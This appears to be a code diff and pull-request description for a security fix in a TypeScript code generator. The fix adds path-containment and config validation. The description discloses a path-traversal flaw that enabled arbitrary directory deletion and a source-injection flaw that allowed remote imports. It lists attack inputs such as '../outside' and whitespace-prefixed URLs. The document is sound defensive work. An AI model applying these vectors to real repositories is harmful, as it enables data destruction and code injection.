+      const parent = path.dirname(current)
+      // Reached the filesystem root without finding anything that exists.
+      if (parent === current) return path.resolve(target)
+      missing.unshift(path.basename(current))
+      current = parent
+    }
+  }
+}
+
+/**
+ * Assert that an already-resolved absolute path lies inside `projectRoot`.
+ *
+ * Containment is decided on the real on-disk locations: `path.resolve` does not
+ * follow symlinks, so a purely lexical comparison can be walked out of via a
+ * symlink placed inside the project root.
+ *
+ * @param original - the path as the user wrote it, for the error message
+ */
+export function assertContainedPath(
+  label: string,
+  resolved: string,
+  projectRoot: string,
+  original: string = resolved
+): void {
+  const relative = path.relative(
+    realpathAllowingMissing(projectRoot),
+    realpathAllowingMissing(resolved)
+  )
+
+  if (relative.startsWith("..") || path.isAbsolute(relative)) {
+    throw new CodegenConfigError(
+      `Invalid ${label} ${JSON.stringify(original)}: resolves to ${JSON.stringify(resolved)}, ` +
+        `which is outside the project root ${JSON.stringify(path.resolve(projectRoot))}. ` +
+        `Generated output must stay inside the project — generated directories are deleted and ` +
+        `rewritten on every run.`
+    )
+  }
+}
+
+/**
+ * Resolve `outDir` against `projectRoot` and assert the result stays inside it.
+ *
+ * The pipeline recursively deletes `<outDir>/declarations` before every
+ * generation, so an `outDir` that escapes the project root turns a config file
+ * into an arbitrary-directory delete.
+ */
+export function resolveContainedOutDir(
+  label: string,
+  outDir: unknown,
+  projectRoot: string
+): string {
+  if (typeof outDir !== "string" || outDir.length === 0) {
+    throw new CodegenConfigError(
+      `Invalid ${label}: expected a non-empty string, received ${
+        outDir === undefined ? "undefined" : JSON.stringify(outDir)
+      }.`
+    )
+  }
+
+  // The path we hand back is the lexically resolved one, so generated file
+  // paths look the way the user wrote them; only the containment decision uses
+  // the real on-disk location.
+  const resolved = path.isAbsolute(outDir)
+    ? path.resolve(outDir)
+    : path.resolve(projectRoot, outDir)
+
+  assertContainedPath(label, resolved, projectRoot, outDir)
+
+  return resolved
+}
+
+export interface ValidatedCanisterPaths {
+  /** The validated canister name. */
+  name: string
+  /** Absolute output directory, guaranteed to be inside `projectRoot`. */
+  outDir: string
+  /** Validated module specifier for the client manager import. */
+  clientManagerPath: string
+}
+
+export interface ValidateCanisterConfigOptions {
+  name: unknown
+  /** Per-canister `outDir`, if the config sets one. */
+  canisterOutDir?: unknown
+  /** Global `outDir`; the canister name is appended to it when used. */
+  globalOutDir: unknown
+  clientManagerPath: unknown
+  projectRoot: string
+  /** Resolved reactor class (`canisterConfig.mode`), if the config sets one. */
+  mode?: unknown
+  /** Resolved runtime target (`canisterConfig.target` / global `target`). */
+  target?: unknown
+}
+
+/**
+ * Validate one canister's config and return the resolved, contained paths the
+ * pipeline should use.
+ *
+ * Call this before any filesystem work: it is the single choke point that all
+ * three entry paths (CLI, vite plugin, direct API) share.
+ */
+export function assertSafeCanisterConfig(
+  options: ValidateCanisterConfigOptions
+): ValidatedCanisterPaths {
+  const {
+    name,
+    canisterOutDir,
+    globalOutDir,
+    clientManagerPath,
+    projectRoot,
+    mode,
+    target,
+  } = options
+
+  assertSafeCanisterName(name)
+  assertSafeModuleSpecifier("clientManagerPath", clientManagerPath)
+
+  // `mode` and `target` reach the generator as bare identifiers and as the
+  // module specifier they are imported from, so they must be known values.
+  if (mode != null) assertOneOf("mode", mode, REACTOR_CLASS_NAMES)
+  if (target != null) assertOneOf("target", target, CODEGEN_TARGETS)
+
+  const outDir =
+    canisterOutDir != null
+      ? resolveContainedOutDir(
+          `outDir for canister ${JSON.stringify(name)}`,
+          canisterOutDir,
+          projectRoot
+        )
+      : path.join(
+          resolveContainedOutDir("outDir", globalOutDir, projectRoot),
+          name
+        )
+
+  return { name, outDir, clientManagerPath }
+}


### PR DESCRIPTION
`ic-reactor.json` and `@ic-reactor/vite-plugin` options are checked into a repository, but the pipeline turned their values into paths it recursively deletes and into source text it writes into the consumer's bundle. Cloning a repository and running `pnpm dev` was enough to trigger either.

Both defects reported `success: true`.

**Path traversal → arbitrary directory delete.** `name` and `outDir` resolved into an output directory with no containment check, and `generateDeclarations` recursively deletes that directory before generating into it. An `outDir` of `../outside`, an absolute path, or a `name` containing `..` deleted directories anywhere the user can write.

**Source injection.** `name`, `clientManagerPath` and `mode` were interpolated raw into generated TypeScript, so a config value could add a live expression or an `import "https://…"` to the application bundle. (`canisterId` was already quoted.)

Private advisories are drafted for both; this PR is the fix.

## The fix

`assertSafeCanisterConfig()` runs at the top of `runCanisterPipeline`, before any filesystem work — the one choke point the CLI, the vite plugin and direct API callers all share.

- **`name`** may contain only `[A-Za-z0-9_.-]`, is never `.` or `..`, and must derive valid TypeScript identifiers. Checking the **derived** names rather than the raw one is deliberate: `dfx` places no pattern restriction on canister names, so `_private` and `my.canister` must keep working — they derive `privateReactor` and `myCanisterReactor` and always generated fine. `2048_game` is rejected because it derives `2048GameReactor`, which is not an identifier. That closes #299, whose suggested fix (reuse the codec renderer's `assertIdentifier`) is stale — that helper was deleted with the renderer when #297 was closed.
- **`outDir`** must resolve inside the project root, compared on **real on-disk paths** so a symlink inside the project cannot step out.
- **`clientManagerPath`** must be a relative or bare specifier — no URI scheme, no surrounding whitespace, no quotes, backslashes or control characters.
- **`mode`/`target`** are checked against their closed sets.

Defence in depth: every interpolation in the reactor generator is now `JSON.stringify`'d, and `getReactorClassImportSource` throws on an unknown class instead of returning `undefined`. Either the quoting or the validation alone stops the reported vectors.

`@ic-reactor/cli`'s `init` validates the `clientManagerPath` it writes to — there it is a write target, not an import specifier.

## Adversarial pass

The first version of this validator was attacked from six angles. Four vectors got through and are fixed here, each with a regression test:

| Vector | Why the first version missed it |
| --- | --- |
| Symlink inside the root | containment was purely lexical; `path.resolve` does not follow symlinks |
| `mode` injection | only `name` and `clientManagerPath` were validated |
| `" https://…"` | leading whitespace defeats an anchored scheme check, and URL parsing strips it |
| non-string `outDir` | threw an uncaught `TypeError` instead of a config error |

## Verification

- **16 of the new tests fail on `main` and pass here** (`pnpm verify:test-fails src/validate.test.ts --package codegen`).
- **No false positives.** Every `ic-reactor.json` and `icReactor({...})` call site in the repo still passes, as do the alias forms `@/lib/client`, `~/clients`, `#internal/clients`, `$lib/clients` and `@acme/pkg/manager`.
- `pnpm test` 1185 passing · `pnpm typecheck` clean · `pnpm typecheck:examples` 20/20 · `pnpm verify:packages` clean (this changes the codegen export surface).

## Note

`schema.json` gains a `pattern` for editor-time feedback, but the pipeline is the enforcement point — the schema cannot express the derived-identifier rule.

Closes #299.